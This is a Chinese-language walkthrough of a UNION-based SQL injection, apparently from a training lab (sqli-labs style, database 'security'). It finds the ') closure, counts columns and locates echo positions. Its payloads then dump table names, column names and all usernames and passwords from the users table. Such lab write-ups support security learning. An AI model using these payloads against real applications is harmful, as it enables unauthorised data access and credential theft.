1、判断什么类型注入
?id=1 正常显示
?id=1' (报错:''1'') LIMIT 0,1')
?id=1'' 正常显示
?id=1'#(报错:''1'') LIMIT 0,1')
可知闭合方式为')
2、查看列数
?id=1') order by 3 --+ (没有报错)
?id=1') order by 4 --+ (报错)
说明有3列
3、使用联合查询查看回显位置(前面为错可以执行后面的)
?id=-1') union select 1,2,3 --+
回显在2,3,列
4、查询数据库名(security)
?id=-1') union select 1,database(),3 --+
5、查询表名(一共爆出四张表,查看敏感表users)
?id=-1') union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema=database();--+
6、查询users表中字段名(查看到了敏感字段id,username,password)
?id=-1') union select 1,database(),group_concat(column_name) from information_schema.columns where table_name='users';--+
7、查看字段username和password的信息
?id=-1') union select 1,database(),group_concat(username,password) from security.users;--+
为了方便分清楚username和密码,可以用id将信息隔开
?id=-1') union select 1,database(),group_concat(username,id,password) from security.users;--+